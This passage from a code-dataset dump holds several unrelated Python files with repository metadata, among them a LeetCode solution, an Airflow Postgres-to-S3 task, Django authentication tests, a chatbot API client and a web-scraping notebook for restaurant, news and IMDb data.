expected\n","repo_name":"Nick-Sullivan/death-dice","sub_path":"lambda/game/test/layer/dao/test_connection_dao.py","file_name":"test_connection_dao.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12186144827","text":"\"\"\"\n    1. Binary tree topic: find the largest value in each row of the tree\n    2. A variant of binary tree level-order traversal\n\"\"\"\nfrom collections import deque\n\n# 2022/7/20 author:WH\nclass Solution:\n    def largestValues(self, root):\n        if not root: return []\n        ans = []\n        que = deque([root])\n        while que:\n            result = []\n            for _ in range(len(que)):\n                cur = que.popleft()\n                result.append(cur.val)\n                if cur.left:\n                    que.append(cur.left)\n                if cur.right:\n                    que.append(cur.right)\n            ans.append(max(result))\n        return ans","repo_name":"Sirwenhao/Leetcode_solution","sub_path":"Python_Solution/middle/leetcode_0515.py","file_name":"leetcode_0515.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"32771490880","text":"from db import model\n\n\n# robustness/robust\ndef register_interface(username, pwd):\n    obj = model.Admin.read(username)\n    if obj:\n        return 'Username is already in use'\n\n    model.Admin(username, pwd)\n\n    return 'Registration successful'\n\ndef create_school_interface(username,school_name,school_addr):\n    admin_obj = model.Admin.read(username)\n    school_obj = model.School.read(school_name)\n\n    if school_obj:\n        return f'School {school_name} already exists'\n\n    admin_obj.create_school(school_name,school_addr)\n\n    return f'{school_name} created successfully'\n\n\ndef create_teacher_interface(username,teacher_username,teacher_pwd):\n    admin_obj = model.Admin.read(username)\n    teacher_obj = model.Teacher.read(teacher_username)\n\n    if teacher_obj:\n        return f'Teacher {teacher_username} already exists'\n\n    admin_obj.create_teacher(teacher_username,teacher_pwd)\n\n    return f'{teacher_username} created successfully'\n\n\ndef create_course_interface(username,course_name,school_name):\n    admin_obj = model.Admin.read(username)\n    school_obj = model.School.read(school_name)\n    course_obj = model.Course.read(course_name) # None\n\n    # check whether the course is already in the school: None, [] --> 
[None]\n    if course_obj in school_obj.course_list:\n        return f'Course {course_name} already exists'\n\n    admin_obj.create_course(course_name)\n    course_obj = model.Course.read(course_name)\n    school_obj.add_course(course_obj) # Python object\n\n\n    return f'{course_name} created successfully'","repo_name":"nickchen121/course_selected","sub_path":"interface/admin_interface.py","file_name":"admin_interface.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38616720909","text":"from airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom tempfile import NamedTemporaryFile\nimport csv\nfrom airflow.utils.db import provide_session\nfrom airflow.providers.amazon.aws.hooks.s3 import S3Hook\nimport logging\n\ndef _postgres_to_s3(ds):\n    '''\n    Send data from Postgres to S3 bucket.\n    '''\n    #https://www.youtube.com/watch?v=rcG4WNwi900\n    #first query data from psql and save in text file\n    hook = PostgresHook(postgres_conn_id=\"postgres_localhost\")\n    conn = hook.get_conn()\n    cursor = conn.cursor()\n    cursor.execute('select * from games;')\n    with NamedTemporaryFile(mode='w') as f: #puts file in temp folder\n        csv_writer = csv.writer(f)\n        csv_writer.writerow([i[0] for i in cursor.description])\n        csv_writer.writerows(cursor)\n        f.flush()\n        cursor.close()\n        conn.close()\n        logging.info(f'Saved postgres data in text file: games.txt')\n        #step 2: upload text file into s3\n        s3_hook = S3Hook(aws_conn_id='aws_hook')\n        s3_hook.load_file(\n            filename=f.name,\n            key=f'games/games_{ds}.csv',\n            bucket_name='mlb-project',\n            replace=True\n        )\n        logging.info(f' {f.name} has been pushed to S3')","repo_name":"DElwellGitHub/baseball-project","sub_path":"dags/functions/postgres_to_s3.py","file_name":"postgres_to_s3.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24785709401","text":"from django.conf import settings\nfrom django.contrib.auth.models import User, UserManager\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.http import HttpRequest\nfrom d51.django.auth.facebook.backends import FacebookConnectBackend, FACEBOOK_CONNECT_BACKEND_STRING\nfrom d51.django.auth.facebook.managers import FacebookIDManager\nfrom d51.django.auth.facebook.models import FacebookID\nfrom facebook import Facebook\nimport mox\nfrom random import randint as random\n\n# Required to mock this out since it's generated dynamically and Mox\n# can't/won't create stuff just for the hell of it.\nclass StubUserProxy(object):\n    def getInfo(self, list):\n        pass\n\ndef replay_all(*args):\n    [mox.Replay(obj) for obj in args]\n\ndef verify_all(*args):\n    [mox.Verify(obj) for obj in args]\n\nclass TestOfFacebookID(TestCase):\n    def test_has_custom_manager(self):\n        self.assert_(isinstance(FacebookID.objects, FacebookIDManager))\n\n    def test_has_get_uid_method(self):\n        random_id = str(random(10, 1000))\n        user = User.objects.create(username=\"foobar\")\n        obj = FacebookID.objects.create(pk=random_id, user=user)\n\n        self.assertEqual(obj, FacebookID.objects.get_uid(random_id))\n\n        obj.delete()\n        user.delete()\n\n\nclass TestOfFacebookConnectBackend(TestCase):\n    def test_returns_none_if_request_not_passed_in(self):\n        auth = FacebookConnectBackend()\n        self.assertEqual(None, auth.authenticate())\n\n    def test_returns_none_if_check_session_fails(self):\n        req = mox.MockObject(HttpRequest)\n        facebook = 
mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(False)\n req.facebook = facebook\n\n replay_all(facebook, req)\n\n auth = FacebookConnectBackend()\n self.assertEqual(None, auth.authenticate(request = req))\n\n verify_all(facebook, req)\n\n def test_manager_defaults_to_main_FacebookIDManager_if_not_specified(self):\n auth = FacebookConnectBackend()\n self.assertTrue(isinstance(auth.manager, FacebookIDManager))\n\n def test_uses_custom_manager_if_provided(self):\n obj = object()\n auth = FacebookConnectBackend(manager = obj)\n self.assertEquals(obj, auth.manager)\n\n def test_user_manager_defaults_to_main_UserManager_if_not_specified(self):\n auth = FacebookConnectBackend()\n self.assertTrue(isinstance(auth.user_manager, UserManager))\n\n def test_uses_custom_user_manager_if_provided(self):\n obj = object()\n auth = FacebookConnectBackend(user_manager = obj)\n self.assertEquals(obj, auth.user_manager)\n\n def test_returns_user_if_found(self):\n random_id = random(10, 100)\n\n user = mox.MockObject(User)\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.get_uid(random_id).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n req.facebook = facebook\n\n replay_all(req, facebook, user, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager)\n self.assertEqual(user, auth.authenticate(request=req))\n\n verify_all(req, facebook, user, fb_id, fb_manager)\n\n def test_returned_user_has_backend_set_to_facebook_backend(self):\n random_id = random(10, 100)\n\n user = mox.MockObject(User)\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.get_uid(random_id).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n req.facebook = facebook\n\n replay_all(req, facebook, user, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager)\n auth.authenticate(request=req)\n self.assertEqual(FACEBOOK_CONNECT_BACKEND_STRING, req.user.backend)\n\n verify_all(req, facebook, user, fb_id, fb_manager)\n\n\n\n def test_returns_newly_created_user_if_not_found(self):\n random_id = random(10, 100)\n username = 'fb$%d' % random_id\n\n user = mox.MockObject(User)\n user.is_authenticated().AndReturn(False)\n user.username = username\n user.set_unusable_password()\n user.save()\n\n user_manager = mox.MockObject(UserManager)\n user_manager.create(\n username=username,\n first_name='Bob',\n last_name='Example'\n ).AndReturn(user)\n\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.model = FacebookID\n fb_manager.get_uid(random_id).AndRaise(FacebookID.DoesNotExist())\n fb_manager.create(pk = random_id, user = user).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n facebook.users = mox.MockObject(StubUserProxy)\n facebook.users.getInfo([random_id], ['name']).AndReturn([{\"name\": \"Bob Example\"}])\n req.facebook = facebook\n\n replay_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager, user_manager=user_manager)\n 
new_user = auth.authenticate(request = req)\n self.assertTrue(isinstance(new_user, User))\n\n verify_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\n def test_creates_new_fb_id_for_existing_user(self):\n random_id = random(10, 100)\n username = 'fb$%d' % random_id\n\n user = mox.MockObject(User)\n user.is_authenticated().AndReturn(True)\n\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n req.facebook = facebook\n\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.get_uid(random_id).AndRaise(FacebookID.DoesNotExist())\n fb_manager.model = FacebookID\n fb_manager.create(pk=random_id, user=user).AndReturn(fb_id)\n\n replay_all(user, req, facebook, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager)\n new_user = auth.authenticate(request=req)\n self.assertEqual(new_user, user)\n\n verify_all(user, req, facebook, fb_manager)\n\n def test_provides_expected_get_user_functionality(self):\n user_id = random(10, 100)\n user = mox.MockObject(User)\n user_manager = mox.MockObject(UserManager)\n user_manager.get(pk = user_id).AndReturn(user)\n replay_all(user, user_manager)\n\n auth = FacebookConnectBackend(user_manager=user_manager)\n self.assertEqual(user, auth.get_user(user_id))\n verify_all(user, user_manager)\n\n def test_returns_none_if_no_user_is_found(self):\n user_id = random(10, 100)\n user_manager = mox.MockObject(UserManager)\n user_manager.model = User\n user_manager.get(pk=user_id).AndRaise(User.DoesNotExist)\n replay_all(user_manager)\n\n auth = FacebookConnectBackend(user_manager=user_manager)\n self.assertEqual(None, auth.get_user(user_id))\n verify_all(user_manager)\n\n def test_handles_string_for_facebook_uid_for_creation(self):\n random_id = str(random(10, 100))\n username = 'fb$%s' % random_id\n\n user = mox.MockObject(User)\n user.is_authenticated().AndReturn(False)\n user.username = username\n user.set_unusable_password()\n user.save()\n\n user_manager = mox.MockObject(UserManager)\n user_manager.create(\n username=username,\n first_name='Bob',\n last_name='Example'\n ).AndReturn(user)\n\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.model = FacebookID\n fb_manager.get_uid(random_id).AndRaise(FacebookID.DoesNotExist())\n fb_manager.create(pk = random_id, user = user).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n facebook.users = mox.MockObject(StubUserProxy)\n facebook.users.getInfo([random_id], ['name']).AndReturn([{\"name\": \"Bob Example\"}])\n req.facebook = facebook\n\n replay_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager, user_manager=user_manager)\n new_user = auth.authenticate(request = req)\n self.assertTrue(isinstance(new_user, User))\n\n verify_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\nclass TestOfPyFacebook(TestCase):\n def validate_signature_return(self):\n return {\n \"in_canvas\": \"0\",\n \"in_iframe\": \"0\",\n \"in_profile_tab\": \"0\",\n \"added\": \"0\",\n \"expires\": \"123\",\n }\n\n def test_can_handle_pyfacebook_error_on_none_expires(self):\n # setup partial mock on check_session()\n request = 
mox.MockObject(HttpRequest)\n request.method = \"GET\"\n request.GET = {}\n request.POST = {}\n facebook = Facebook('foo', 'bar', 'baz')\n request.facebook = facebook\n\n def mock_validate_signature(*args, **kwargs):\n ret = self.validate_signature_return()\n ret['expires'] = 'None'\n return ret\n facebook.validate_signature = mock_validate_signature\n\n replay_all(request)\n\n auth = FacebookConnectBackend()\n self.assertEqual(None, auth.authenticate(request=request))\n\n def test_still_throws_an_exception_on_unanticipated_exceptions(self):\n request = mox.MockObject(HttpRequest)\n request.method = 'GET'\n request.GET = {}\n request.POST = {}\n request.facebook = Facebook('foo', 'bar', 'baz')\n\n def mock_validate_signature(*args, **kwargs):\n ret = self.validate_signature_return()\n ret['expires'] = 'some-random-number-%d' % random(100, 200)\n return ret\n request.facebook.validate_signature = mock_validate_signature\n replay_all(request)\n\n auth = FacebookConnectBackend()\n self.assertRaises(ValueError, auth.authenticate, request=request)\n\n","repo_name":"domain51/d51.django.auth","sub_path":"d51/django/auth/facebook/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10865,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"12630898671","text":"import requests\n\nAPI_ENDPOINT = \"https://waynecool.ngrok.app/api/chat\"\nAPI_KEY = \"YOUR_SECRET_API_KEY\"\n\ndef send_message_to_chatbot(message):\n headers = {\n \"Authorization\": f\"Bearer {API_KEY}\",\n \"Content-Type\": \"application/json\"\n }\n data = {\"message\": message}\n \n response = requests.post(API_ENDPOINT, json=data, headers=headers)\n \n if response.status_code == 200:\n return response.json()[\"response\"]\n else:\n return f\"Error: {response.text}\"\n\nif __name__ == \"__main__\":\n while True:\n user_input = input(\"You: \")\n if user_input.lower() in [\"quit\", \"exit\"]:\n break\n response = send_message_to_chatbot(user_input)\n print(f\"Bot: {response}\")\n","repo_name":"LogicPy/Python","sub_path":"AI Projects/.ai website foundation template/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"6309460535","text":"import json\n\nfrom django.dispatch import receiver\nfrom django_cas_ng.signals import cas_user_authenticated, cas_user_logout\n\n\n@receiver(cas_user_authenticated)\ndef cas_user_authenticated_callback(sender, **kwargs):\n args = {}\n args.update(kwargs)\n print('''cas_user_authenticated_callback:\n user: %s\n created: %s\n attributes: %s\n ''' % (\n args.get('user'),\n args.get('created'),\n json.dumps(args.get('attributes'), sort_keys=True, indent=2)))\n\n\n@receiver(cas_user_logout)\ndef cas_user_logout_callback(sender, **kwargs):\n args = {}\n args.update(kwargs)\n print('''cas_user_logout_callback:\n user: %s\n session: %s\n ticket: %s\n ''' % (\n args.get('user'),\n args.get('session'),\n args.get('ticket')))\n","repo_name":"django-cas-ng/example","sub_path":"mysite/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"26459177070","text":"#!/usr/bin/python3\n\"\"\"\nThis model contains a unit test class for the BaseModel class\n\"\"\"\nimport unittest\nimport pycodestyle\nfrom models import storage\nfrom models.base_model import BaseModel\nfrom datetime import 
datetime\n\n\nclass TestBaseClass(unittest.TestCase):\n \"\"\"\n BaseModel test class\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initializes BaseModel instances\n \"\"\"\n self.bm1 = BaseModel()\n self.bm2 = BaseModel()\n\n def test_pep8_compliance(self):\n \"\"\"\n Tests compliance of the class with pep8\n \"\"\"\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['models/base_model.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")\n\n def test_save(self):\n \"\"\"\n Tests save method works as expected\n \"\"\"\n self.before_save = self.bm1.updated_at\n self.bm1.save()\n self.assertNotEqual(self.bm1.updated_at, self.before_save)\n\n def test_to_dict(self):\n \"\"\"\n Test to_dict method works as expected\n \"\"\"\n self.bm1_dict = dict(self.bm1.__dict__)\n self.bm1_dict['__class__'] = \"BaseModel\"\n self.bm1_dict['created_at'] = self.bm1_dict['created_at'].isoformat()\n self.bm1_dict['updated_at'] = self.bm1_dict['updated_at'].isoformat()\n\n self.assertDictEqual(self.bm1_dict, self.bm1.to_dict())\n\n def test_create_from_dict(self):\n \"\"\"\n Tests that BaseModel creates an instance from kwargs\n and that the created instance is not the same as previous instance\n from which the kwargs were created from\n \"\"\"\n self.bm = BaseModel()\n self.bm1_json = self.bm1.to_dict()\n self.bm_from_dict = BaseModel(**self.bm1_json)\n self.assertNotEqual(self.bm, self.bm_from_dict)\n\n def test_uuid_type(self):\n \"\"\"\n Tests that the id assigned to the instance is of type string\n \"\"\"\n self.assertEqual(str, type(self.bm1.id))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smithjilks/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15627028645","text":"from __future__ import print_function\nimport csv\nimport os\nimport random\n\nnumBlocksPerType = 4\n\nallFaces = [img for img in os.listdir('../valence_img/faces') if img.endswith('jpg')]\nambFaces = [img for img in allFaces if ('SP' in img or 'SU' in img)]\nhapFaces = [img for img in allFaces if 'HA' in img]\nangFaces = [img for img in allFaces if 'AN' in img]\n\nallScenes = [img for img in os.listdir('../valence_img/scenes') if img.endswith('jpg')]\nambScenes = [img for img in allScenes if img.startswith('A')]\nposScenes = [img for img in allScenes if img.startswith('P')]\nnegScenes = [img for img in allScenes if img.startswith('N')]\n\nfaceSeqs, sceneSeqs = [], []\n\nwith open('stim.csv', 'r') as stimFile:\n reader = csv.reader(stimFile, delimiter=',')\n counter = 2 * numBlocksPerType\n for row in reader:\n if counter % 2 == 0:\n if counter <= numBlocksPerType:\n ambStim, posStim, negStim, stimSeqs = list(ambFaces), list(hapFaces), list(angFaces), faceSeqs\n else:\n ambStim, posStim, negStim, stimSeqs = list(ambScenes), list(posScenes), list(negScenes), sceneSeqs\n random.shuffle(ambStim)\n random.shuffle(posStim)\n random.shuffle(negStim)\n stimSeq = []\n for stimType in row:\n if stimType == '2':\n stimSeq.append(ambStim.pop())\n elif stimType == '1':\n stimSeq.append(posStim.pop())\n elif stimType == '0':\n stimSeq.append(negStim.pop())\n stimSeqs.append(stimSeq)\n counter -= 1\n if counter == 0:\n break\nprint(faceSeqs)\nprint(sceneSeqs)\nwith open('stimuli.csv', 'w') as outfile:\n writer = csv.writer(outfile)\n for seq in faceSeqs:\n 
writer.writerow(seq)\n    for seq in sceneSeqs:\n        writer.writerow(seq)\n","repo_name":"CSNLab/valence-bias","sub_path":"psychopy/stimuli.py","file_name":"stimuli.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1018878733","text":"with open(\"repos.csv\", \"r\") as table:\n    r = 0\n    w = 0\n    s = 0\n    f = 0\n    for line in table:\n        tok = line.split(\",\")\n        if tok[0] == \"name\":\n            continue\n        name = tok[0]\n        weight = 2 * int(tok[1]) + 3 * int(tok[2]) + 4 * int(tok[3])\n\n        # output weight table\n        print(\"{},{}\".format(name, weight))\n        w += int(tok[1])\n        s += int(tok[2])\n        f += int(tok[3])\n        r += 1\n    # output statistical summary\n    # print(\"{} repos, total watch {}, total star {}, total fork {}\".format(r, w, s, f))\n","repo_name":"Alan052918/Package-Dependency-Scaling-Analysis","sub_path":"repo-sampling/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42814705411","text":"import numpy as np\nimport chopper_context as cctx\nimport neutron_context as nctx\nimport matplotlib.pyplot as plt\n\n# Calculates the resolution limit of the chopper system for removing the frame overlaps and due to mechanical stability\n# of the choppers\n\nplt.rcParams.update({'font.size': 20})\n\nwavelengths = np.linspace(cctx.wavelength_min, cctx.wavelength_max, num=100)\nwavenumbers = nctx.wavelength2wavenumber(wavelengths)\n\nu_rt = cctx.limit_frame_overlap(wavenumbers, cctx.distance12, cctx.distance1s, np.deg2rad(12), np.deg2rad(9), 5, 1,\n                                cctx.tau_max, cctx.tau_min)\nu_rt_f = cctx.limit_mechanical(wavenumbers, np.deg2rad(12), 10e3 / 60.0, cctx.distance1s)\n\nfig, ax = plt.subplots(figsize=(10, 6))\n# ax.plot(wavelengths * 1e10, u_rt * 100)\nax.plot(wavelengths * 1e10, u_rt * 100, label=\"Frame-overlap limit\")\nax.plot(wavelengths * 1e10, u_rt_f * 100, label=\"Mechanical limit\")\nax.legend()\nax.set_xlabel(r\"Wavelength ($\\mathrm{\\AA}$)\")\nax.set_ylabel(r\"Smallest achievable $\\frac{\\Delta t}{t} * 100\\%$\")\nax.tick_params(axis=\"both\", top=True, right=True, direction=\"in\")\nfig.savefig(\"Resolution\\\\ChopperResolution_Limit.png\", bbox_inches='tight')\nplt.close(fig)\n","repo_name":"rtang-sidney/Mushroom","sub_path":"chopper_resol_limit.py","file_name":"chopper_resol_limit.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7683469405","text":"import cv2\r\nimport numpy as np\r\n\r\nfrom registry import Registries\r\n\r\nfrom .base_scorer import BaseScorer\r\n\r\n\r\n@Registries.scorer.register(\"uniform\")\r\nclass UniformScorer(BaseScorer):\r\n    def __init__(self, **kwargs):\r\n        super().__init__(**kwargs)\r\n\r\n    def score_frame(self,\r\n                    group_size: int = 2,\r\n                    resize_shape: tuple = (64, 64),\r\n                    sort: bool = True,\r\n                    unitized: bool = True) -> list:\r\n        assert self.scores is not None and self.scores == [], \"please call reset first\"\r\n        assert group_size > 1, f\"the group size for {self.__class__.__name__} should be greater than 1\"\r\n\r\n        frame_count = len(self.frames)\r\n        for idx in range(frame_count):\r\n            if idx % group_size == 0:\r\n                data = {\"index\": idx,\r\n                        \"score\": 1}\r\n            else:\r\n                data = {\"index\": idx,\r\n                        \"score\": 0}\r\n            self.scores.append(data)\r\n\r\n        if sort:\r\n            self.scores = self._sort_score(self.scores)\r\n        if unitized:\r\n            self.scores = 
self._unitize(self.scores)\r\n return self.scores\r\n","repo_name":"JasonZuu/Frame-Selection","sub_path":"scorer/uniform_scorer.py","file_name":"uniform_scorer.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15843560192","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # WEB SCRAPING ASSIGNMENT-1\n\n# Write a python program to scrape mentioned details from dineout.co.in and make data frame\n\n# In[1]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[2]:\n\n\npage= requests.get(\"https://www.dineout.co.in/delhi-restaurants/buffet-special\")\npage\n\n\n# In[3]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[4]:\n\n\nRestaurantname =[]\n\n\n# In[5]:\n\n\nfor i in soup.find_all(\"a\",class_=\"restnt-name ellipsis\"):\n Restaurantname.append(i.text)\n \nRestaurantname\n\n\n# In[6]:\n\n\nCuisine=[]\n\n\n# In[7]:\n\n\nfor i in soup.find_all(\"span\",class_=\"double-line-ellipsis\"):\n Cuisine.append(i.text.split('|')[1])\n \nCuisine\n\n\n# In[8]:\n\n\nLocation=[]\n\n\n# In[9]:\n\n\nfor i in soup.find_all(\"div\",class_=\"restnt-loc ellipsis\"):\n Location.append(i.text)\n \nLocation\n\n\n# In[10]:\n\n\nRatings=[]\n\n\n# In[11]:\n\n\nfor i in soup.find_all(\"div\",class_=\"restnt-rating rating-4\"):\n Ratings.append(i.text)\n \nRatings\n\n\n# In[12]:\n\n\nImages=[]\n\n\n# In[13]:\n\n\nfor i in soup.find_all(\"img\",class_=\"no-img\"):\n Images.append(i.get(\"data-src\"))\n\nImages\n\n\n# In[14]:\n\n\nimport pandas as pd\ndf = pd.DataFrame({'Restaurantname':Restaurantname,'Cuisine':Cuisine,'Location':Location,'Ratings':Ratings,'Images_URL':Images})\n\n\n# In[15]:\n\n\ndf\n\n\n# \n# \n# \n# Write a python program to scrape mentioned news details from https://www.cnbc.com/world/?region=world and make data frame\n# \n\n# In[16]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[17]:\n\n\npage=requests.get('https://www.cnbc.com/world/?region=world')\n\npage\n\n\n# In[18]:\n\n\nnews=BeautifulSoup(page.content)\n\nnews\n\n\n# In[19]:\n\n\nHeadline=[]\nfor i in news.find_all('a',class_='LatestNews-headline'):\n Headline.append(i.text)\nHeadline\n\n\n# In[20]:\n\n\nTime=[]\n\n\n# In[21]:\n\n\nfor i in news.find_all(\"time\",class_=\"LatestNews-timestamp\"):\n Time.append(i.text)\n\nTime\n\n\n# In[22]:\n\n\nurl = \"https://www.cnbc.com/world/?region=world\"\nwebpage = requests.get(url) \ntrav = BeautifulSoup(webpage.content, \"html.parser\")\nfor link in trav.find_all('a'):\n print(type(link), \" \", link)\n\n\n# In[23]:\n\n\ntrav.text\n\n\n# In[25]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"News\":Headline,\"Time\":Time,})\ndf\n\n\n# \n# Write a python program to scrape the details of most downloaded articles from AI in last 90 days\n\n# In[26]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[27]:\n\n\npage= requests.get(\"https://www.journals.elsevier.com/artificial-intelligence/most-downloaded-articles\")\npage\n\n\n# In[28]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[29]:\n\n\ntitles=[]\n\nfor i in soup.find_all(\"h2\",class_=\"sc-1qrq3sd-1 gRGSUS sc-1nmom32-0 sc-1nmom32-1 btcbYu goSKRg\"):\n titles.append(i.text)\n\ntitles\n\n\n# In[30]:\n\n\nAuthor=[]\n\nfor i in soup.find_all(\"span\",class_=\"sc-1w3fpd7-0 dnCnAO\"):\n Author.append(i.text)\n\nAuthor\n\n\n# In[31]:\n\n\nDate=[]\n\nfor i in soup.find_all(\"span\",class_=\"sc-1thf9ly-2 dvggWt\"):\n Date.append(i.text)\n\nDate\n\n\n# In[35]:\n\n\nurl = 
\"https://www.journals.elsevier.com/artificial-intelligence/most-downloaded-articles\"\nwebpage = requests.get(url) \ntrav = BeautifulSoup(webpage.content, \"html.parser\")\nfor link in trav.find_all('a'):\n print(type(link), \" \", link)\n\n\n# In[37]:\n\n\ntrav.text \n\n\n# In[38]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Title\":titles,\"Author\":Author,\"Published Date\":Date,\"url\":\"https://www.journals.elsevier.com/artificial-intelligence/most-downloaded-articles\"})\ndf\n\n\n# Write s python program to display list of respected former presidents of India(i.e. Name , Term of office) from https://presidentofindia.nic.in/former-presidents.htm and make data frame. \n\n# In[39]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[40]:\n\n\npage= requests.get(\"https://presidentofindia.nic.in/former-presidents.htm\")\npage\n\n\n# In[41]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[42]:\n\n\nName=[]\nfor i in soup.find_all('h3'):\n Name.append(i.text)\n\nName\n\n\n# In[43]:\n\n\nTerm=[]\nfor i in soup.find_all('p'):\n Term.append(i.text)\n \nTerm\n\n\n# In[44]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"PresidentiaL List\":Name})\ndf\n\n\n# \n# Write a python program to display IMDB’s Top rated 50 movies’ data (i.e. name, rating, year of release) and make data frame\n\n# In[45]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[46]:\n\n\npage= requests.get(\"https://www.imdb.com/search/title/?groups=top_100\") \npage\n\n\n# In[47]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[48]:\n\n\ndef get_movie_titles(soup):\n \n selection_class=\"lister-item-header\"\n movie_title_tags=soup.find_all('h3',{'class':selection_class})\n movie_titles=[]\n\n for tag in movie_title_tags:\n title = tag.find('a').text\n movie_titles.append(title)\n \n \n return movie_titles\n\n\n# In[49]:\n\n\ntitles = get_movie_titles(soup)\ntitles\n\n\n# In[50]:\n\n\nRatings=[]\ndef get_movie_rating(soup):\n rating_selector=\"inline-block ratings-imdb-rating\" \n movie_rating_tags=soup.find_all('div',{'class':rating_selector})\n movie_rating_tagss=[] \n for tag in movie_rating_tags:\n movie_rating_tagss.append(tag.get_text().strip())\n return movie_rating_tagss\n\n\n# In[51]:\n\n\nRatings = get_movie_rating(soup)\nRatings\n\n\n# In[52]:\n\n\nyear=[]\nfor i in soup.find_all(\"span\",class_=\"lister-item-year text-muted unbold\"):\n year.append(i.text)\n\nyear\n\n\n# In[53]:\n\n\nimport pandas as pd\ndf = pd.DataFrame({'Name':titles,'ratings':Ratings,'year':year})\ndf\n\n\n# Write a python program to display IMDB’s Top rated 50 Indian movies’ data (i.e. 
